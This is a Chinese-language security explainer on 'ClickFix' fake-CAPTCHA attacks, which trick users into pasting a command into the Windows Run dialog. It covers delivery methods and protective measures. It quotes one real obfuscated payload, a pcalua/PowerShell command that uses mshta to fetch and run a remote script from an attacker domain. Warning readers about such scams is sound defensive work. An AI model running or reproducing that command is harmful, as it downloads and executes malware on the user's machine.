理解 ClickFix 驗證碼惡意軟體攻擊

理解 ClickFix 驗證碼惡意軟體攻擊

ClickFix 攻擊向量

A "ClickFix" attack is 一種社交工程技巧,惡意行為者假裝提供技術修復或安全驗證,誘使用者在自己的機器上手動執行程式碼。在 Hacker News 上報告的一起近期事件中,一位造訪合法新聞部落格的使用者遇到了一個假的 CAPTCHA 頁面,該頁面要求 "Manual Verification Steps" 以證明他們是人類。

這些步驟通常會指示使用者:

  1. 按下 Win + R (開啟 Windows 執行對話框)。
  2. 按下 Ctrl + V 然後按 Enter (將剪貼簿中的命令貼上並執行)。

此方法被用來繞過傳統瀏覽器安全沙盒,因為使用者被明確告知在瀏覽器環境外執行命令,這樣有效地授予惡意軟體作業系統的管理員或使用者層級存取權。

惡意載荷分析

在該事件中,複製到使用者剪貼簿的載荷是一個設計用來下載並執行遠端腳本的 PowerShell 命令:

pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi"

技術分析顯示此攻擊具有以下幾種複雜特徵:

  • 混淆: 該命令使用插入符號 (^) 來混淆 URL 和命令字串,使得簡單的模式匹配安全工具更難檢測。
  • 動態傳遞: 釣魚頁面常透過使用 srcDoc 建立的 iframe 傳遞,這可以隱藏惡意內容以躲過某些掃描器。
  • 基於區塊鏈的執行: 此攻擊的一些版本高度複雜,會從以太坊或 Base 智慧合約抓取 JavaScript 腳本來執行,使攻擊者能夠維持持續且去中心化的命令與控制 (C2) 基礎設施。
  • 持續性: 攻擊可能會利用 LocalStorage 儲存腳本,這些腳本會在每次頁面載入時被評估,確保惡意軟體即使在初始投放器執行後仍然持續存在。

常見傳遞方式

這些攻擊經常透過被入侵的合法網站傳遞,通常透過被黑的內容管理系統(CMS)如 WordPress,或透過惡意廣告(惡意軟體廣告)。使用者可能會在他們多次造訪過的部落格或新聞網站上遇到這些假 CAPTCHA,這使攻擊看起來更可信。

其他傳遞方式包括:

  • SEO 中毒: 惡意連結會出現在搜尋引擎結果的頂部,有時偽裝成官方軟體下載(例如,假的 Claude AI 安裝程式)。
  • 被入侵的瀏覽器擴充功能: 擁有廣泛權限的惡意擴充功能可以將這些釣魚框架注入使用者造訪的任何頁面。

如何保護自己

CAPTCHA 或任何網站驗證流程沒有正當理由要求您透過 Windows 執行對話框或終端機執行程式碼。如果網站要求您執行命令來「驗證您是人類」,那就是一種詐騙。

立即防禦行動

  • 永遠不要執行 網站提供的命令,在您的系統終端機或執行對話框中。
  • 回報釣魚網域 給像 Google Safe Browsing 這樣的服務,並將可疑檔案或 URL 上傳到 VirusTotal

長期安全層

  • 使用廣告攔截器: 如 uBlock Origin 之類的工具可以阻止許多用於傳遞這些攻擊的惡意腳本和廣告網路。
  • DNS 過濾: 使用安全導向的 DNS 提供者(例如 Quad9)或帶有封鎖清單的本地解析器(例如 Pi-hole)可以防止瀏覽器連線到已知的惡意網域。
  • 終端使用者警覺: 對異常的瀏覽器行為保持懷疑態度。如果網站要求系統層級權限或手動命令執行,請將其視為安全威脅。

Sources